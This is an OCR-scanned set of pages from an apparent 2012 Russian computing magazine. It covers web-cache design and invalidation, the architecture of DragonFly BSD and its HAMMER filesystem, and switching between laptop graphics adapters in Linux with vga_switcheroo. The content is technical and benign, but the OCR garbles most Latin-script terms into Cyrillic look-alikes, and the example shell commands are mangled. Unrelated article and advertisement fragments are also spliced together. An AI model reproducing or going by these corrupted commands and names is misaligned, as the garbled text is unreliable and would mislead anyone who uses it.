какМаіІ.Пи). Под средними мы под- 
разумеваем такие сайты, количество 
обращений ккоторым достигает 
около 60 миллионов в сутки. 



Константин Машуков 

Бизнес-аналитик 
в компании Олега 
Бунина. Констан- 
тин пришел из 
мира суперком- 
пьютеров, где 
долгое время «пи- 
лил» различные 
научные приложения, связанные 
с числодробилками. В качестве 
бизнес-аналитика участвует во 
всех консалтинговых проектах 
компании, будь то социальные сети, 
крупные интернет-магазины или 
системы электронных платежей. 
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АКАДЕМИЯ 



всех бэкен до в. Хранение кешированных да иных раздельно 
для каждого из бэкен дов может дать некоторое преимущество 
в скорости извлечения данных, но значительно усложнит логи- 
ку обслуживания кеша. Представьте, что вам нужно сбросить 
какой-то за кешированный элемент: в этом случае вы должны 
пройти по всем бэкен дам и сбросить этот элемент в локальном 
кеше. В процессе использования подобного обхода у вас воз- 
ни кает первая проблема — неконсистентность кеша. Проще 
говоря, где-то данные в кеше будут уже сброшены, а где-то 
еще нет. В результате часть пользователей видятеще старые 
данные, а кто-то — уже новые. Вторая потенциальная проблема 
также связана с целостностью данных. Допустим, в одном из 
кешей сбросить элемент не удалось. Что теперь делать? По- 
пробуйте найти красивое и элегантное решение этого вопроса. 
Прийти туда ещеразчерез минуту? А кому прийти? Еще одна 
надстройка над системой кеширования? Ну и, наконец, главная 
проблема — в случае локальных кешей данных одни и те же 
данные будут вычисляться многократно (по числу кешей). 
Фактически мы перекладываем нагрузку на базу данных, что не 
всегда хорошо. 

Второй важный момент. Кеш — это скорее способ замазать 
проблему производительности, а не решить ее. Но, безусловно, 
бывают ситуации, когда решить проблему очень дорого. Поэтому 
вы говорите: «Хорошо, эту трещи ну в стене я замажу штукатур- 
кой, и будем думать, что ее здесь нет». Иногда это работает — 
более того, это работает очень даже часто. Особенно когда вы 
попадаете в кеш и там уже л ежат данные, которые вы хотели 
показать. Классический пример — счетчик количества друзей. 
Это счетчик в базе данных, и вместо того, чтобы перебирать всю 
базу да иных в поисках ваших друзей, гораздо проще эти данные 
за кешировать (и не пересчитывать каждый раз). 

Для кеша есть критерий эффективности использования, то 
есть показатель того, что он работает, — он называется НИ: Па*іо. 
Это отношение количества запросов, для которых ответ нашелся 
в кеше, кобщемучислузапросов. Если он низкий (50-60%), значит, 
у вас есть лишние накладные расходы на поход к кешу. Это озна- 
чает, что практически на каждой второй странице пользователь, 
вместо тогочтобы получитьданные избазы, еще и ходитк кешу: 
выясняет, что да иных для него там нет, после чего идет на прямую 
к базе. А это лишние две, пять, десять, сорок миллисекунд. 

Как обеспечивать хорош ий НИ: Ра^іо? В тех местах, где у вас база 
данныхтормозит, и втехместах, гдеданные можно перевычислять 
достаточно дол го, там вы втыкаете МетсасНе, Ресііз или анало- 
гичный инструмент, который будетвыполнятьфункцию быстрого 
кеша, — и это начинает вас спасать. По крайней мере, временно. 

ПРОБЛЕМА ИНВАЛИДАЦИИ КЕША 

Нос использованием кеша вы бонусом получаете проблему и н- 
валидации кеша. В чем суть? Вы положили данные в кеш и берете 
их из кеша, однако к этому моменту оригинальные да иные уже 
поменялись. Например, Машенька поменяла подпись под своей 
картинкой, а вы зачем-то положили одну строчку в кеш вместо 
того, чтобы тянуть каждый раз из базы данных. В результате вы 
показываете старые данные — это и есть проблема и н вал и да - 
ци и кеша. В общем случае она не имеет решения, потому что эта 
проблема связана с использованием данных вашего бизнес- 
приложения. Основной вопрос: когда обновлять кеш? Ответить на 
него подчас непросто. 

Например, пользователь публикует в социальной сети новый 
пост — допустим, в этот момент мы пытаемся избавиться от всех 
инвалидныхданных. Получается, нужно сбросить и обновить все 
кеши, которые имеют отношение кэтому посту. Вхудшем случае, 
если человек делает пост, вы сбрасываете кеш с его ленты постов, 
сбрасываете все кеши с ленты постов его друзей, сбрасываете 
все кеши с ленты людей, у которых в друзьях есть те, кто в этом 
сообществе, и та к да л ее. В итоге вы сбрасываете половину кешей 




Проблема 
инвалидации кеша 



Обновление 
по запросу 
(проблема гасе 
сопсііііоп 

для нагруженных 
страниц); 
Фоновое 
обновление 



в системе. Когда Цукерберг публику- 
ет пост для своих одиннадцати с по- 
ловиной миллионов подписчиков, 
мы что — должны сброситьодиннад- 
цать с половиной миллионов кешей 
френдленту всех этих зиЬзсгіЬег'ов? 
Какбытьстакой ситуацией? Нет, мы 
пойдем другим путем и будем обнов- 
лятькеш призапросе на френдленту, 
где естьэтотновый пост. Система 
обнаруживает, что кеша нет, идет 
и вычисляетзаново. Подход простой 
и надежный, какскала. 

Однако есть и минусы: если сбро- 
сился кешу популярной страницы, вы 
рискуете получитьтак называемые 
гасе сопсііііоп (состояние гонок), то 
естьситуацию, когда этотсамый кеш 
будетодновременно вычисляться 
несколькими процессами (несколько 
пользователей решили обратить- 
ся к новым данным). В итоге ваша 
система занимается довольно пустой 
деятельностью — одновременным 
вычислением п- го количества одина- 
ковыхданных. 

Один из выходов — одновре- 
менное использование нескольких 
подходов. Вы не просто стираете 
устаревшее значение из кеша, 
а только помечаете его как уста- 
рев шее и одновременно ставите 
задачу в очередь на пересчет нового 
значения. Пока задание в очереди 
обрабатывается, пользователю 
отдаетсяустаревшеезначение. Это 
называется деградация функцио- 
нальности: вы сознательно идете на 
то, что некоторые из пользователей 
получат не самые свежие данные. 
Большинство систем с продуманной 
бизнес-логикой имеют в арсенале по- 
добный подход. 



ПРОБЛЕМА СТАРТА 
СНЕПРОГРЕТЫМКЕШЕМ 

Еще одна проблема — старте не- 
прогретым (то есть незаполненным) 
кешем. Такая ситуация наглядно 
иллюстрируетутверждение о том, 
что кеш не может решить проблему 
медленной базы данных. 

Предположим, что вам нужно 
показать пользователям 20 самых 
хорошихпостовза какой-либо 
период. Эта информация была 
у вас в кеше, но к моменту за- 
пуска системы кеш был очищен. 
Соответственно, все пользователи 
обращаются кбазеданных, которой 
для построения индекса нужно, 
скажем, 500 миллисекунд. В итоге 
все начинает медленно работать, 
и вы сами себе сделали БоБ ШепіаІ- 
о^-зегѵісе). Сайтне работает. 

Отсюда вывод: незанимайтесь 
кешированием, пока у вас не ре- 
шены другие проблемы. Сделайте, 
чтобы база быстро работала, и вам 
не нужно будетвообще возиться 
с кешированием. Тем не менее даже 
у проблемы старта с незаполнен- 
ным кешем есть решения: 

1. Использовать кеш-хранилище 
с записью на диск (теряем в ско- 
рости); 

2. Вручнуюзаполнять кеш перед 
стартом (пользователиждут 

и негодуют); 

3. Пускать пользователей на сайт 
партиями (пользователи всетак 
же ждут и негодуют). 

Как видите, любой способ плох, 
поэтому л ишь повторимся: старай- 
тесьсделатьтак, чтобы ваша систе- 
ма работала и без кеширования . ПС 
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166 рублей за номер! 



Нас часто спрашивают: «В чем преимущество подписки?» 

Во-первых, это выгодно. Потерявшиесовесть распространи- 
тели не стесняются продаватьжурнал за 300 рублей и выше. 
Во-вторых, это удобно. Не надо искатьжурнал в продаже 
и бояться проморгать момент, когда весьтиражуже разберут. 
В-третьих, это быстро (правда, это правило действуетне для 
всех): подписчикам свежий выпускотправляется раньше, чем 
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ОПЕРАЦИОННОЙ 

СИСТЕМЫ 

ОКАСОЫРЬУ В5Р 



Когда в 2003 году Мэтью Диллон объявил о начале работы 
над собственным форком РгееВБО 4 с акцентом на простоту 
дизайна и многопроцессорные системы, никто его затею всерьез 
не воспринял и многие «спецы» предрекали, что скоро энтузиазм 
закончится и проект закроют. Тем не менее ОгадопНу ВБй 
оставалась на плаву многие годы и за восемь лет превратилась 
в одну из самых интересных ІІЫІХ-подобных систем современности. 










Анатомия стрекозы 





Стрекоза — официальный талисман ОгадопРІуВЗО 



Конфигуратор инсталлятора ОгадопРІуВЗй 



ВВЕДЕНИЕ 



История йгадопРІу В5й началась с разногласий, и все после- 
дующее развитие операционной системы подвергалось критике 
и необоснованным нападкам. Долгое время Диллона обвиняли 
в том, что он слишком амбициозен, ломает традиции и вообще 
изобретает велосипед. Неоднократно ему приходилось объяснять 
очередным консерваторам, почему В5й должна отойти от прежних 
стереотипов развития и пойти по пути инноваций. Были написаны 
километры писем, интервью, статей, сотни тысяч строк кода, но 
йгадопРІу В50 так и оставалась противоречивым проектом, от ко- 
торого у молодежи загорались глаза, а ветераны скрипели зубами. 

Именно стремление сломать стереотипы и коренным образом 
изменить все, начиная от подхода к разработке и заканчивая 
принципами работы ОС, сделали йгадопРІу В5й столь интересной 
операционной системой. йгадопРІу внесла в сообщество В5й то, 
чего ему так давно не хватало, влила свежую кровь и наметила 
путь к инновациям. Внутри этой системы кроется столько интерес- 
ных и нестандартных идей, что даже І_іпих, с его манией аккумули- 
ровать внутри себя самые противоречивые разработки, кажется на 
ее фоне скучным и обыденным. 

Складывается впечатление, что Мэтью Диллон вообще не 
знает слова «консерватизм». Он спокойно избавляется от вещей, 
которые, на его взгляд, не нужны, и добавляет в систему функ- 
циональность, вызывающую множество споров. Он без зазрения 
совести выкидывает из ядра целые подсистемы и заменяет их 
аналогами. Кажется, что он просто выплескивает идеи в код, но 
у него всегда есть план развития на многие годы вперед. Его без- 
граничный энтузиазм и креативность зажигают умы сотен других 
разработчиков, которые предлагают и реализуют собственные 
идеи, во многом противоречивые и спорные, но эффективные 
и интересные. 

БгадопРІу — это обратная сторона В5Б, лишенная непроходи- 
мого консерватизма и наполненная духом академической системы, 
в которой полно новых идей и разработок, созданных без оглядки 
на проверенные временем, но во многом неэффективные решения. 
И пусть пока БгадопРІу не показывает впечатляющих результатов 
в тестах производительности и не может предложить законченное 
решение для внедрения в продакшн, все предпосылки для этого 
у системы есть, а Диллон даже не собирается останавливаться на 
достигнутом. 



НАЧАЛО НАЧАЛ, ИЛИ МУЛЫИЯДЕРНЫЙ БУМ 



Предпосылкой к рождению йгадопРІу стали разногласия Мэтью 
Диллона с командой разработчиков РгееВБй по поводу механизмов 
работы системы на многоядерных/многопроцессорных системах. 
Участники РгееВБй Соге Теат придерживались традиционно- 
го подхода к обеспечению эффективной работы операционной 



системы с многими ядрами. Главная идея этого подхода состоит 
в использовании блокировок везде, где только может возникнуть 
проблема одновременного доступа к ресурсам. Это позволяет 
плавно перенести систему на новые процессоры, не нарушив 
работу ключевых компонентов ядра. Диллон же, напротив, был 
убежден, что многоядерные системы требуют коренных изменений 
в ядре для того, чтобы ОС могла эффективно использовать все 
ресурсы системы и при этом не разрослась в большой кусок кода, 
наполненный взаимозависимыми блокировками и требующий 
серьезных затрат на сопровождение и развитие. Консерватизм 
победил, и Диллон создал собственный форк РгееВБО, главной 
особенностью которого и стал совершенно новый подход к работе 
системы с многими процессорными ядрами. 

Чтобы понять, что предложил Диллон, необходим небольшой 
экскурс в теорию. 5МР-системы отличаются тем, что имеют единое 
адресное пространство для всех процессорных ядер. Другими 
словами, все ядра используют одну память, которая никак между 
ними не делится, всем доступно все. Отсюда возникает очевидная 
проблема: что будет, если два потока исполнения ядра попытают- 
ся получить доступ или изменить одну и туже структуру данных 
(значение переменной зузсіі, например) одновременно? Ответ: воз- 
никнет коллизия (поток, который должен был сделать это вторым, 
может сделать это первым или наоборот, со всеми вытекающими 
отсюда последствиями). Самое простое решение этой проблемы — 
запретить исполнение всего кода ядра одновременно несколькими 
процессорами с помощью глобальной блокировки (Від біапі Боек), 
как и было сделано в РгееВЗБ 4. Пока один процессор исполняет 
код ядра, второй ждет. 

Само собой, подход этот неэффективен, и в РгееВБО 5 было за- 
планировано начать постепенное избавление ядра от глобальной 
блокировки с помощью более узкоспециализированных блокиро- 
вок, которые будут установлены на все сколько-нибудь значимые 
структуры данных. Так код ядра мог исполняться несколькими про- 
цессорами, а ждать приходилось только в случае одновременного 
доступа к одним и тем же структурам данных. Проблема такого 
подхода состояла в том, что из-за блокировок, во-первых, код ядра 
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ІЖІХОІО 



В РЕЗУЛЬТАТЕ РАЗДЕЛЕНИЯ 
ЯДРА НА ОТДЕЛЬНЫЕ ПОТОКИ 
0КА60ЫРІ.Ѵ ПРИОБРЕЛА ЧЕРТЫ 
МИКРОЯДЕРНЫХ ОС 

превращался в груду кода с множеством локов, значительная часть 
которых к тому же зависели друг от друга, так что приходилось го- 
родить кучу костылей. Во-вторых, код становился малоэффектив- 
ным, так как блокировки применялись повсеместно и без расчета, 
что определенные типы данных в принципе не могут иметь про- 
блем с одновременным доступом, поскольку актуальны только для 
одного процессорного ядра. Зачем, например, блокировать доступ 
к структуре данных процесса, если к нему хочет получить доступ 
процесс, работающий на том же ядре? Подход с использованием 
блокировок вообще не рассчитан на такие ситуации и требует, 
чтобы структура данных была заблокирована в любом случае. 

Диллон предложил решить эти и другие возможные проблемы 
с помощью трех ключевых идей: привязки данных к процессорам, 
сообщений и мягких блокировок. Первая идея — переписать ядро 
с учетом того, что процессы, работающие на одном процессоре, 
не требуют каких-либо взаимных блокировок. Для этой цели была 
реализована идея легковесных нитей ядра (ШКТ), по одной на 
каждый процесс в системе, и отдельный планировщик на каждый 
процессор. Для доступа к данным друг друга нити используют ме- 
ханизм сообщений, который позволяет избежать блокировок, обе- 
спечивает правильную последовательность выполнения операций 
доступа и не накладывает никакого оверхеда при обмене данными 
между нитями, работающими на одном процессоре. 

Тотже подход был применен ко многим другим подсистемам 
ядра, например, внутриядерный аллокатор памяти был разделен 
на несколько копий, по количеству процессоров, так, что процесс 
выделения памяти и работы с ней не требовал блокировок. Код 
сетевой подсистемы также был разделен на несколько потоков, 
работающих на разных ядрах. В дальнейшем таким же образом 
были переписаны и другие подсистемы, включая подсистему 
ввода-вывода и ѴР5. Общая идея состояла в том, что если ты хо- 
чешь получить доступ к данным, то просто посылаешь сообщение 
и получаешь их в ответ без необходимости применения каких-либо 
блокировок. 

В случае сданными, обслуживаемыми корневыми компо- 
нентами ядра и актуальными для всей системы в целом (те же 
переменные зузсіі, например), применялся другой подход: для 
блокировки данных использовалась система сериализующих 
токенов. Пояснить, как она работает, можно на примере очереди 
в кабинет к стоматологу. Если один поток исполнения хочет по- 
лучить доступ к данным, он берет токен (талон) и ждет, пока другой 
поток, взявший токен на доступ к тем же данным, не освободит 




Файловая система НАММЕР используется по умолчанию 



их и не вернет токен. Если человек задержался где-то в другом 
месте, все остальные люди не будут заблокированы в его ожида- 
нии, — он просто потеряет свое место в очереди, и ему придется 
поменять талон, когда он освободится. Применительно к йгадопРІу 
это значит, что поток, имеющий токен, но заблокированный по 
другой причине или спящий, временно теряет токен и приобретает 
его вновь, когда будет разблокирован. Это очень важное отличие 
токенов от блокировок, которое позволяет малой кровью избежать 
главной проблемы РгееВЗй и других ОС, использующих традици- 
онные блокировки, под названием беасііоск, для обхода которой 
применяется множество костылей. 

Интересно, что в результате разделения ядра на отдельные 
потоки, доступ к которым осуществляется с помощью сообще- 
ний, йгадопРІу приобрела некоторые черты микроядерных ОС. 
Теперь можно, во-первых, легко перенести подсистемы, драйверы 
и файловые системы (их тоже планируется вынести в отдельные 
потоки) в пространство пользователя, что существенно повысит 
стабильность работы ОС. Во-вторых, даром получить возможность 
асинхронного выполнения доступа к данным, например неблоки- 
рующий ввод-вывод. 



НАММЕК 



Вторая важная идея, которая легла в основу йгадопРІу, — это воз- 
можность из коробки работать в кластерах. С этой целью Диллон 
собирается задействовать все тотже механизм сообщений, кото- 
рый позволит распараллелить ядро не просто на несколько про- 
цессорных ядер, но и на несколько физических машин. В качестве 
сетевого хранилища в кластере будет использоваться распреде- 
ленная файловая система НАММЕР, которая уже сейчас помечена 
как стабильная и входит в состав йгадопРІу по умолчанию. 

Во многом НАММЕР напоминает уже знакомые нам файловые 
системы 2Р5 и Вігіъ, но отличается архитектурой и дизайном. 
Основные возможности этой ФС: 

• поддержка неограниченного количества снапшотов; 

• восстановление ошибок во время монтирования 
без использования Іъск; 

• инкрементальное зеркалирование данных на подчиненные узлы; 

• контрольныесуммыдляобеспечения целостности 
данныхи метаданных; 

• автоматическая дедупликация данных 
(одинаковые блоки данных будут объединены в один); 

• максимальный размер: 1 экзобайт. 

При этом НАММЕР — полностью распределенная ФС, которая по- 
зволяет объединить хранилища данных множества машин в единую 
ФС с гарантией высокой доступности и сохранности данных с по- 
мощью дублирования. В настоящий момент файловая система может 
работать только в режиме «один мастер — много подчиненных», 
что существенно ограничивает области ее применения, однако 
в НАММЕР2, работа над которой идет полным ходом, это ограниче- 
ние будет снято, и ФС сможет работать в мультимастер-режиме. 

Интересно также, что НАММЕР не является файловой систе- 
мой, работающей по принципу сору-оп-ѵѵгііе, поэтому механизм 
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При установке на НАММЕР дополнительные разделы будут размещены 
в псевдоразделах системы НАММЕР, называемых РР5 
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Обновляемся! 



создания снапшотов в ней реализован по-другому. При создании 
снапшота просто происходит заморозка всех данных, а измене- 
ния осуществляются уже в новых блоках. На таком же принципе 
основан механизм ведения истории, когда снапшоты создаются 
с помощью команд, прописанных в сгоп. 

Если говорить о производительности, то в данный момент 
НАММЕР не может похвастаться высокими скоростями. Она бы- 
стрее стандартной файловой системы ІІР5, но гораздо медленнее 
2Р5, ВМз и ех*4. Мэтью Диллон уже затеял большой редизайн 
файловой системы в рамках проекта НАММЕР2, в результате 
которой она станет настоящей сору-оп-ѵѵгііе файловой системой 
и лишится многих своих недостатков, однако ожидать ее появле- 
ния стоит не раньше 2013 года. 



ВИРТУАЛЬНОЕ ЯДРО, 5ѴѴАРСАСНЕ 
И ЗАМОРОЗКА ПРОЦЕССОВ — 



На сообщениях, легковесных нитях ядра и кластерной файловой 
системе нововведения и особенности ОгадопРІу не заканчиваются. 
Здесь есть множество других весьма любопытных и полезных идей, 
о которых разработчики других систем даже не задумываются. 
Наиболее интересные из них — это виртуальное ядро, способное 
работать как пользовательский процесс, драйвер для вынесения 
метаданных файловой системы на другой накопитель зѵѵарсасЬе 
и механизм заморозки процессов, позволяющий сохранить теку- 
щее состояние приложения в файл. 

Виртуальное ядро представляет собой способ запуска ядра 
ОгадопРІу в пространстве пользователя с эмуляцией накопителей 
при помощи дисковых образов и виртуализацией сети при помощи 
Іар-интерфейса. В свое время Диллон реализовал эту технологию 
для упрощения отладки ядра и тестирования кластерной функ- 
циональности, однако она также может быть использована для 
виртуализации наравне с подсистемой ЗаіІ. Виртуальное ядро ком- 
пилируется вместе с основным и помещается в исполняемый файл 
/ѵаг/ѵкегпеІ/Ьооі/кегпеІ/кегпеІ, с помощью которого его можно 
запустить, указав при необходимости загрузочные диски и скон- 
фигурировав виртуальную сеть. 

Еще одна интересная особенность системы, которая появилась 
в ОгадопРІу 2.6, — это механизм зѵѵарсасЬе, позволяющий кеши- 
ровать данные и метаданные файловой системы в зѵѵар-разделе 
твердотельных дисков. Основная идея при этом заключается в том, 
что 550-диски по определению быстрее обрабатывают операции 
ввода-вывода и поэтому могут быть использованы для ускорения 
доступа к часто используемым данным и метаданным. В первую 
очередь зѵѵарсасЬе ориентирован на применение в системах с не- 
большим количеством оперативной памяти, которой может просто 
не хватить для постоянного хранения кеша файловой системы. 

В этом случае вѵѵарсасЬе позволяет достигнуть хорошего баланса 
между количеством памяти, свободным для приложений, и произ- 
водительностью работы. 

Механизм сохранения состояния приложений — еще одна 
любопытная особенность ОгадопРІу. С его помощью пользователь 
в любой момент может заморозить процесс и разместить его образ 



на диске так, чтобы потом этот образ можно было восстановить 
в памяти и продолжать использовать приложение. Во многом 
он напоминаетутилиту СгуоРЮ для І_іпих ( сгѵорісІ.ЬегІіоз.сІе ). одна- 
ко реализация выполнена внутри ядра, а потому лишена многих ее 
недостатков. Чтобы заморозить приложение, достаточно нажать 
<СігІ+Е>, а для разморозки — выполнить команду сЬескрІ -г ЕІе. 
скрЕ Приложение останется в том же состоянии, в котором было 
в моментзаморозки. 

На этой технологии основан и механизм ускорения запуска 
приложений, который выполняет в ОгадопРІу ту же роль, что 
и технология предварительной линковки (ргеііпкіпд) приложений 
в І_іпих. Работает он практически идентично технологии сохране- 
ния состояния, за тем исключением, что образ сохраняется не в от- 
дельный файл, а внутрь самого исполняемого файла со специаль- 
ной пометкой для линковщика ІсІ-еІЕзо, который пропускает шаги 
по линковке файла и размещает его в память, как есть. В ОгадопРІу 
эта технология называется гезісіепі и позволяет существенно 
сократить время запуска тяжеловесных приложений, зависящих 
от многих библиотек. 

Кроме всего перечисленного, в ОгадопРІу также была с нуля 
реализована собственная виртуальная файловая система сіеѵ^з, 
ответственная за хранение файлов устройств, файловая система 
пиІКздля монтирования образов дисков, подсистема шифрования 
дисковых разделов, оптимизированная для работы на многоядер- 
ных системах, утилита Ісріаудля работы с разделами и образами, 
зашифрованными с помощью ТшеСгурЕ новый справедливый пла- 
нировщик ввода-вывода Ыщ, механизм журналирования файловой 
системы ІІР5, масса подсобных утилит, вроде србир для клони- 
рования каталогов, а также множество драйверов и подсистем, 
портированных из других 1350-систем. 



выводы 



Пока еще рано говорить об успехе ОгадопРІу как операционной 
системы для многоядерных систем и кластеров, однако свой след 
в истории она уже оставила, вынудив разработчиков других ОС 
пересмотреть свои взгляды на то, как система должна работать 
на многопроцессорных машинах. Многие идеи ОгадопРІу уже были 
переняты разработчиками 0репВ50, РгееВ5й и І_іпих в их реали- 
зации многопоточности внутри ядра, что позволило поднять про- 
изводительность на новый уровень. Файловая система НАМ МЕР 
также вызвала большой интерес специалистов, некоторые из них 
даже приступили к ее переносу в Ыпих и РгееВВР. ПЕ 



МЭТЬЮ ДИЛЛОН 



Мэтью Диллон был широко из- 
вестным контрибьютором РгееВББ, 
для которой он практически 
с нуля переписал всю подсистему 
управления виртуальной памятью, 
а также внес большие поправки 
в другие подсистемы. В свое время 
был заметной фигурой в кругах 
разработчиков для персонального 
компьютера Атіда — из его опера- 
ционной системы Диллон почерп- 
нул множество идей, которые за- 
тем легли в основу ОгадопРІу В50. 
Окончил университет Беркли 
в Калифорнии, где впервые и по- 
знакомился с В50-системами. 



• доо.дІ/Н2ІрО — 

письмо в список 
рассылки {гееЬзсІ- 
сиггепі с анонсом 
ОгадопРІу В50; 

• аоо.аі/ 

РВ50у — длинный 
список проектов, 
планируемых 
к реализации в 
ОгадопРІуВБО; 

• ѵѵѵѵѵѵ.БИіпіпдзі- 
Іепсе.сот/сІЬБШод — 
блог о состоянии 
развития ОС. 




* В ходе работы 
над ОгадопРІу ВБй 
в декабре 2011 
года Мэтью Диллон 
выявил неизвестную 
ошибку в процес- 
сорах АМй, которая 
могла приводить 
к краху приложений. 



Через три месяца 
инженеры АМО под- 
твердили наличие 
ошибки. 

• В качестве 
механизма 
установки 
стороннего 
ПО в ОгадопРІу 
официально 
используется 
система портов ркд- 
Бгс из операционной 
системы №1- 

ВБй, а количество 
прекомпилиро- 
ванных пакетов 
переваливает 
за 7000. 

* Для нормальной 
работы НАММЕР 
достаточно компа 
со 128 Мб ОЗУ (для 
сравнения: 2Р5 
требуется как 
минимум 1 Гб). 



ХАКЕР 09 /164/2012 



113 





ІШІХОШ 



Евгений Зобнин (ехесЬіі.ги) 



X 



СКРЫТЫЕ 

РЕЗЕРВЫ 

Видеоадаптеры уже давно перестали быть только лишь средством 
вывода картинки на экран. Сегодня они способны обрабатывать огромные 
объемы информации, их мощности можно использовать для ускорения 
математических операций, можно переключаться на лету между 
несколькими картами и даже объединять в высокопроизводительный 
кластер. О том, как все это сделать в І_іпих, я расскажу в данной статье. 



ЗАДЕЙСТВУЕМ СОВРЕМЕННЫЕ 
ВИДЕОКАРТЫ НА ПОЛНУЮ 
КАТУШКУ 
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Скрытые резервы 



ЦІМІІХ И ТЕХНОЛОГИЯ ГИБРИДНОЙ графики 



Когда речь заходит о новых технологиях и продвинутых возмож- 
ностях железа, пользователи Ыпих почти всегда оказываются 
в пролете. Производители оборудования редко задумываются 
об одном-двух процентах пользователей альтернативных ОС, 
оставляя их без драйверов, фирменных утилит и технической 
поддержки. Долгое время одними из немногих, кто всерьез за- 
нимался полноценной поддержкой своего оборудования в Ыпих, 
оставались компании Іпіеі, ІМѴЮІА и (частично) АТІ, своевременно 
выпускавшие качественные драйверы для пингвина, однако 
иони не смогли обеспечить уровень совместимости со своим обо- 
рудованием, доступный пользователям всем известной операци- 
онной системы. 

Так, в частности, случилось с ноутбуками, оснащенными техно- 
логией гибридной графики, позволяющей отключать дискретный 
видеоадаптер на время простоя системы и задействовать вместо 
него интегрированный в материнскую плату графический процес- 
сор. В системах под управлением ѴѴіпсіоѵѵз Ѵізіа/Беѵеп технология 
работала практически из коробки и позволяла существенно про- 
длить жизнь ноутбука от батареи, тогда как пользователей Ыпих 
такой подход к экономии энергии ставил в тупик. 

Графическая подсистема Ыпих никогда не была рассчитана на 
возможность переключения видеоадаптеров на лету и строилась 
на предположении, что в системе есть только один адаптер, от- 
вечающий за вывод графики. Это абсолютно логичная и стройная 
схема, которая неплохо вписывалась даже в идею 5І_І, однако 
новая «гениальная» мысль хардварщика сломала ее на корню. 

Сначала появились ноутбуки с хардварным мультиплексором 
видеовывода, к которому Ыпих удалось приспособить хотя бы 
частично с помощью интеграции в ядро системы ѵда_зѵѵіІсЬегоо — 
она переключает видеовыход на другой адаптер с помощью 
вызовов функций АСРІ, но требует перезапуска X ѴѴіпбоѵѵ (об этом 
способе я расскажу чуть позже). Затем появилось нечто новое 
и неожиданное, которое в компании ІМѴЮІА окрестили технологи- 
ей Оріітиз (Бупегду на десктопах). Она, в отличие от стандартных 
механизмов переключения, вообще не требовала наличия муль- 
типлексора и работала на основе перенаправления графических 
команд, полученных драйвером ІМѴЮІА, на встроенный в материн- 
ку адаптер Іпіеі. 

Со временем эта проблема была решена с помощью систе- 
мы ВитЫеЬее, которая использует технологию виртуализации 
ОрепОІ_, позволяющую перенаправлять графические команды на 
разные видеоадаптеры. Однако ни о каком методе автоматическо- 
го выбора нужного адаптера, применяемого в драйверах ІМѴЮІА 
для ѴѴіпсіоѵѵз, при этом речи не идет, хотя работы в данной области 
уже ведутся. 




Система ѵда_зѵѵіІсЬегоо, позволяющая использовать хардвар- 
ный мультиплексор для переключения между видеоадаптерами, 




Сравнение производительности Зй-графики на дискретной и встроенной картах 




Контрольная панель ЫѴЮІА в системе с поддержкой Оріітиз теперь имеет 
дополнительную вкладку 
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Некоторые ноутбуки позволяют выбрать используемую по умолчанию видеокарту 
в СМ05 5е1ир 

появилась еще в ядре Ыпих 2.6.34 и до сих пор обладает двумя су- 
щественными ограничениями: необходимостью завершения иксов 
перед переключением и зависимостью от видеодрайвера, которая 
проявляется в том, что переключение возможно только при ис- 
пользовании открытых видеодрайверов. Все это существенно 
ограничивает полезность технологии гибридной графики, однако 
на безрыбье, как известно, и пингвин акула. 

Использовать ѵда_зѵѵіІсЬегоо довольно просто. Он уже включен 
в ядро, поэтому никаких особых шаманств и танцев с бубном ис- 
полнять не придется. Для начала удостоверимся, что наше ядро 
собрано с поддержкой данной технологии: 

$ §гер -і змііісііегоо /Ьоо1:/сопРі§-* 

Если все ок, проверяем наличие файла /зуз/кегпеІ/сІеЬид/ 
ѵдазѵѵіІсЬегоо/зѵѵіІсЬ и просмотрим его содержимое: 

$ 1з -1 /зѵз/кегпеІ/сІеЬи^/ѵ^азыіІісІіегоо/зыіІісІі 
$ саѣ /5уз/кегпе1/сІеЬи§/ѵ§а5мі1:сІіегоо/5мі1:сІі 
0 : + : Рмг : 0000 : 00 : 02 . 0 
1: іО-Р-Р: 0000: 01: 00.0 

Знак плюса здесь указывает на активную карту, а слово Рѵѵг — 
на то, что она включена, или, иными словами, на ней есть напря- 
жение. Само соответствие между номерами и видеоадаптерами 
можно посмотреть с помощью следующей команды: 

$ Ізрсі | §гер ѴСА 

Переключение между адаптерами осуществляется с помощью 
записи команд в тот же файл. 
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БѵѵкІсЙлЫй СгарШСЬ - Нагйѵѵлгс ітрІйгПСПШійП 
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Технология переключения адаптеров с помощью мультиплексора 



МѴЮІД ОрЕіГпиЬ — Нзгсіѵ^гс ІтрІегтіспШіст 

іЬТЛ ѵы ог-яш 

Г_ >• Я 
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ЗіггрІгПіі Роиііпф 

* Ё«Ь ЧЙИ "ВІМ-1 -Э"» 

* №ЛгіНМ<Л«ІІ 



МѴШІА Орбтиз выполняет переключение программно 



Всего поддерживается шесть команд: 

• 015 — переключение на дискретную видеокарту; 

• ІОй — переключение на интегрированную видеокарту; 

• 0015 — переключение на дискретную видеокарту 
при следующем запуске Х-сервера; 

• 0100 — переключение на интегрированную видеокарту 
при следующем запуске Х-сервера; 

• ОМ — включить неиспользуемую видеокарту; 

• 0РР — выключить неиспользуемую видеокарту. 

Интересными для нас здесь остаются только две: 0015 и 0130, 
так как позволяют производить манипуляции прямо из X ѴѴіпсіоѵѵ 
(первые две сработают только в консоли). Теперь попробуем пере- 
ключиться на встроенную карту: 

$ 511 СІО -5 

• есМо ОМ > /5У5/кегпе1/сІеЬи§/ѵ§а5ыі1:сІіегоо/5ыі1:сІі 

• есНо РІСР > /5у5/кегпе1/сІеЬи§/ѵ§а5ыі1:сІзепоо/5ыі1:сІі 

Далее выходим из X ѴѴіпсіоѵѵ любым удобным способом (напри- 
мер, с помощью завершения сеанса) и логинимся вновь, при этом 
не забываем отключить дискретную карту: 

• есНо ОРР > /5у5/кеппе1/сІеЬи§/ѵ§а5ыі1:сІіепоо/5ыі1:сІі 

Обратное переключение производится тем же способом. 
Никаких альтернативных конфигов иксов при этом не требуется. 
Х-сервер сам подхватит активную карту и будет использовать ее 
для вывода графики. Для удобства можно использовать скрипт 
зѵѵі*сЬ_Ье*ѵѵееп_сагсІ5.5Ь (опубликован в блоге азизтбНа-ѵѵііЬ- 
Ііпих.Ыодзроі.сот ), не забыв выполнить команду: 

• сЬомп твой юзернэйм /зѵз/кетеІ/сІеЬи^/ѵ^азіу/іІісЬегоо/зіл/іІісІі 

и добавить ее в файл /е*с/іпі*.сІ/гс.ІосаІ. Кстати, эта же команда по- 
зволит вручную изменять режимы без использования зисіо. 



В ПОИСКАХ ТРИГГЕРА 



В случае, если файл /5уз/кегпеІ/сІеЬид/ѵда5ѵѵі*сЬегоо/5ѵѵі*сЬ не 
